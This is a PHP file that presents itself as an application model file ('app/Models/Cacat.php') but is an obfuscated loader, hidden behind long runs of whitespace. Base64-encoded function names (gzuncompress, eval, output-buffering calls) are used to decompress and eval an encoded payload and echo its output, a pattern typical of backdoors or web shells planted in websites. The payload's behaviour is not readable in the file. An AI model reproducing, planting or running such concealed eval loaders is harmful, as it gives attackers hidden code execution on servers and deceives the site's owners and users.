<?php 
        $__='printf';$_='Loading app/Models/Cacat.php';
        



















































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrt2llvgjAcAPB3kn0HHpbUJYsC7oghPAARJk4XNYOWFwMFAUVhq+c+/fDYYfbismWH+f8ajhb+tGmbPpDy/NZpv6Cg/DGZTAdI3mR3FOTleaWVBWHKKrpHvWk5j3NeTz3GyuUykrndN/gTDtLvJW49aPw3Uj6UICzWGHHExDXrCtoUvY3+QXYTS+EBAOA4ITq2hQBbs4ZpS8RZZJZRG+DV6Hq7aBar5na57kNXAQAAAAAA8N/A7wwAADheyPdYeHXRD0KaBSGSoUcAAACAL9nfbaBH+Yw4YkqrWkyk+6iDtQWui3PXtBl9Yk19Yj+5Pc3yzaXoO+mM4G6K6904MI2E4HZxbzO/aoiucym8xN0tsiaRljGttqKOZAwJ7kQujoXinRFdaW1f6qa+ml/riRo1dHXeTLIoFLTcH8cpHaeCa9aGg576cLvI1s8jemPNA9MeFseooXcF4ljM7am1hh4IgWQnWGoXbTcEq2jvoJMpSOa4n+9QZXMt7XJn8mfC38UeEnj6VmEJrc/o/LVa2B/yN/aH7I9VaW9ybIfqTH4GVS6f3Q==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


















































































































































































                                                                                                                                                                                                                     $________;
